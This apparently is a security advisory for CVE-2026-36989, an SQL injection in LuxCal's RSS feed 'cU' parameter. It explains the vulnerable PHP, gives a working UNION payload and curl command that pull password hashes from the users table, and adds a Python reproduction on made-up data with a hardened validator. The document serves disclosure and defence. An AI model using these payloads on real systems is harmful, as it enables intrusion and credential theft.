CVE-2026-36989
# LuxCal Vulnerability (CVE-2026-36989)

SQL injection in the RSS feed endpoint (`rssfeed.php`) through the `cU` (user filter) parameter. The parameter is turned into a list of `?` placeholders, but only its digits are replaced; every other character is concatenated into the statement text, so the prepared statement is built from attacker-controlled SQL.

## In rssfeed.php:

```php
require './common/retrieve.php';
// (...)
if (isset($_GET['cU'])) {
    // Every run of digits becomes a '?' placeholder; everything else in cU
    // (parentheses, keywords, comment markers) is kept verbatim.
    $placeholders = preg_replace("~\d+~",'?',$_GET['cU']);
    $filter .= " AND e.`userID` IN ({$placeholders})";
    // The raw parameter is appended to the value list that is later bound.
    $values .= ','.$_GET['cU'];
}
// (...)
retrieve($fDate,$tDate,'',[$filter,substr($values,1)],'*');
```

The only transformation applied to `cU` is the `preg_replace` that turns digits into `?`. It does not validate that the parameter is a comma-separated list of integers, so any non-digit input flows straight into `$filter` and from there into the query text. This is not a prepared statement protecting the values; it is string concatenation with placeholders sprinkled in.

## In common/retrieve.php:

```php
function retrieve($start,$end,$iFilter='',$xFilter='',$eType='0') {
    // (...)
    $query = "SELECT e.`ID` AS eid, e.`type` AS typ,
    // (...)
    WHERE e.`status` >= 0".($filter ? " AND ($filter".($eType === "*" ? " OR e.`type` > 0" : "").")" : "")."
    // (...)
    // $filter is already part of the statement text when it is prepared;
    // only the '?' placeholders are bound from $valArr.
    $stH = stPrep($query);
    stExec($stH,$valArr);
    // (...)
}
```

`$filter` is concatenated into `$query` before `stPrep()` is called, so the attacker-supplied part of `$filter` is parsed as SQL. The `?` placeholders only ever carry the digits that were replaced; the surrounding SQL is under the attacker's control.

## Example payload to obtain passwords from the database:

> :warning: this payload is for the **SQLite** version only, LuxCal 5.3.4L, available here: https://www.luxsoft.eu/dloader.php?file=luxcal534L.zip

```text
http://127.0.0.1:8000/rssfeed.php?cal=mycal&cU=) OR 0)) UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT group_concat(password) FROM users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 /*
```

The leading `) OR 0))` closes the `IN (` list and the parentheses that `retrieve()` wraps around the filter. The `UNION SELECT` supplies one column for each column of the original `SELECT` (the zeros are padding), with the `group_concat(password)` subquery placed in the column that the feed renders as `Category`. Because the subquery contains no digits it survives `preg_replace` untouched, and the trailing `/*` comments out the rest of the original `WHERE` clause and `ORDER BY`.

### The query text handed to `stPrep()`:

```sql
SELECT e.`ID` AS eid, e.`type` AS typ, -- (...) WHERE e.`status` >= 0 AND ((c.`ID` IN () OR ?)) UNION SELECT ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT group_concat(password) FROM users),?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,? /*)) OR e.`type` > 0) AND e.`sDate` <= '2026-03-18' AND (CASE WHEN e.`eDate` LIKE '9%' THEN e.`sDate` ELSE e.`eDate` END >= '2026-03-05' OR e.`rUntil` >= '2026-03-05') ORDER BY e.`sDate`
```

### The value list handed to `stExec()` (`valArr`), built from the raw `cU`:

```text
) OR 0)) UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT group_concat(password) FROM users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 /*
```

## Result: the passwords are returned in the feed's Category field:

```sh
curl 'http://127.0.0.1:8000/rssfeed.php?cal=mycal&cU=)%20OR%200))%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3000,0,0,0,0,0,0,0,0,0,(SELECT%20group_concat(password)%20FROM%20users),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20/*%0D%0A' -s | grep "Category"
```

```rss
Category: ,21232f297a57a5a743894a0e4a801fc3]]>
```

The leaked value `21232f297a57a5a743894a0e4a801fc3` is the MD5 digest of the string `admin`, so the stored password hashes are unsalted MD5 and directly crackable.

## Found by Mathys REBOUX
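## Added example: reproducing the placeholder bug and a hardened filter

The following is an added example, not LuxCal code. It re-implements the `cU` filter construction from `rssfeed.php` in Python against an in-memory SQLite database with a constructed, much smaller schema (LuxCal's real tables have many more columns, which is why the real payload needs so many padding zeros). Two things are assumptions: the tables and rows are made up, and the raw `cU` string is split on commas to produce the bound value list, since the page does not show how `stExec()` receives `valArr`. Beside the vulnerable builder it shows a hardened one that validates the parameter as a list of integers and derives the placeholder count from the validated list, which is the fix a reviewer would ask for.

```python
"""Model of the CVE-2026-36989 filter construction against in-memory SQLite.

Added example, not LuxCal's code. Schema, sample rows and the comma-splitting of
the value list are assumptions made for the demonstration.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for LuxCal's events/users tables."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (ID INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
        INSERT INTO users VALUES (2, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE events (ID INTEGER PRIMARY KEY, userID INTEGER,
                             status INTEGER, title TEXT);
        INSERT INTO events VALUES (10, 1, 0, 'admin event');
        INSERT INTO events VALUES (11, 2, 0, 'alice event');
        INSERT INTO events VALUES (12, 2, -1, 'deleted event');
        """
    )
    return con


def vulnerable_filter(cu: str):
    """Mirrors rssfeed.php: digits -> '?', every other character stays in the SQL text."""
    placeholders = re.sub(r"\d+", "?", cu)
    sql = f"e.`userID` IN ({placeholders})"
    # Assumption: the raw value list is split on commas to feed the placeholders.
    values = cu.split(",")
    return sql, values


def hardened_filter(cu: str):
    """Accept only a comma-separated list of integers; placeholders come from the count."""
    ids = cu.split(",")
    if any(re.fullmatch(r"\d+", i) is None for i in ids):
        raise ValueError("cU must be a comma-separated list of integers")
    placeholders = ",".join("?" * len(ids))
    return f"e.`userID` IN ({placeholders})", [int(i) for i in ids]


def run_feed(con: sqlite3.Connection, cu: str, build):
    """Simplified retrieve(): the filter is spliced into the statement before preparing,
    wrapped in parentheses the same way retrieve() wraps $filter."""
    sql_filter, values = build(cu)
    query = (
        "SELECT e.`ID`, e.`title` FROM events e "
        f"WHERE e.`status` >= 0 AND ({sql_filter}) ORDER BY e.`ID`"
    )
    return con.execute(query, values).fetchall()


# Same shape as the page's payload, sized for the two-column SELECT above:
# ')' closes IN (), 'OR 0)' closes the wrapping parenthesis, the subquery has no
# digits so it survives the replacement, '/*' comments out the rest of the query.
PAYLOAD = ") OR 0) UNION SELECT 0,(SELECT group_concat(password) FROM users) /*"


def leaked_passwords(con: sqlite3.Connection) -> str:
    """Run the payload through the vulnerable builder; the UNION row carries the hashes."""
    rows = run_feed(con, PAYLOAD, vulnerable_filter)
    return rows[-1][1]


if __name__ == "__main__":
    db = make_db()
    print("benign, vulnerable builder:", run_feed(db, "1,2", vulnerable_filter))
    print("benign, hardened builder:  ", run_feed(db, "1,2", hardened_filter))
    print("leaked via UNION:          ", leaked_passwords(db))
    try:
        run_feed(db, PAYLOAD, hardened_filter)
    except ValueError as exc:
        print("hardened builder rejected payload:", exc)
```

Both builders behave identically for well-formed input such as `1,2`; the difference is that `hardened_filter` refuses anything that is not an integer list before any SQL is assembled, so the number of `?` placeholders is always equal to the number of bound integers and no attacker text ever reaches the statement.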